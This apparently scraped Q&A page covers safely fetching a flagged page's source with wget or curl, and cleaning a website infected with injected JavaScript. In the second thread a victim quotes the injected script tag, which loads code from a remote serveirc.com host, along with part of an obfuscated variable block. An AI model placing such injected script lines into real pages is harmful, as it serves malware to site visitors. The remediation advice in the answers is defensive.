google chrome - Download webpage source HTML without visiting page

08
2014-07
  • AUTO

    So, I've got a situation with a malicious page. First off, Chrome will not let me visit the page at all. With firefox, it blocks me, but will allow me to ignore the message.

    I don't want to visit the page though. But I need to figure out what's wrong with it.

    Is it possible to download the HTML source code from the page without viewing it?

    EDIT: I'm kinda wondering if there's a site that can do it. I've seen indirect page renderers that view and render the page - wasn't sure if there's a site that can provide a page source downloader. If not though, that's fine - however I can get it will suit me.

    • Answers
  • arpz

    You can use wget or curl, if you're running a *NIX operating system then either of them will be installed already, if not then you can get Windows wget from 

    http://gnuwin32.sourceforge.net/packages/wget.htm

    or curl from 

    http://curl.haxx.se/download.html

    You will be 'visiting' the page, but you'll only get the source code, and it won't be rendered at all meaning it's safe to view.

    In response to your edit, I suppose you could use this tool -

    http://onlinecurl.com/


    • Related Question

    javascript - Javascripted malware detected, how to delete?
  • Questioner

    Google Chrome welcomed me with the detection of malicious code. I was able to track down the code in the source (firebug), but I don't know how to find the .js scripts where the codes are located. It consists of 2 scripts:

    1. <script src="http://12nwsp.serveirc.com//ml.php" type="text/javascript"> </script>
    2. <script type="text/javascript">var bWUW1aIO9J="YEXI018YEXI035";var fGdfWY1etv0="YEXI03cYEXI073YEXI063YEXI07"; and a lot more vars in that.

    These javascripts are located in the bottom of the page, after the closing </html> tag..

    Funny thing is... Once I created another subdomain on my host, and I installed Wordpress and did some things, the exact same 12nwsp.serveirc.com was back.

    Now I've searched and searched, and came to the conclusion that it could well be created by iframes, (and I do have them).

    If you want to look and help me out, it's http://test.donm.nl/vanderwal (it's sort of an online catalogue).

    I just wonder if there's any tool or something that can tell me where those annoying bugger scripts are located, so I can remove them.

    Ty


    • Related Answers
  • bobince

    You've been hacked. Probably by an FTP account compromise: you get a trojan on a client machine that is used to upload to the site, it steals your password and an automated attack later logs in to add scripts to all your HTML files.

    You can use a plain old find-in-files tool to locate the <script> blocks, but just removing the scripts on its own will do no good. You'll just get attacked again.

    There are some other possibilities, like insecure server-side applications combined with poor permissions settings, or a wider server-level compromise—though the other sites on that server don't seem to be infected. FTP account compromises are the most common vector right now.

    You should take your site off-line, scan every machine you have used to access your FTP, with multiple checkers. Don't trust just one AV: today's anti-virus tools just cannot keep up with the breadth of attacks. Similarly, they're far from guaranteed to remove everything if you've been compromised, so if you find anything, or if that machine has had any history of picking up any trojan in the past, you need to flatten it and re-install the OS. (Then ensure your browser and any plugins are up-to-date, and remove plugins you don't 100% need, to avoid future infection.)

    Then you can change your FTP password, remove the scripts and take the site back on-line. (And use SFTP in future.)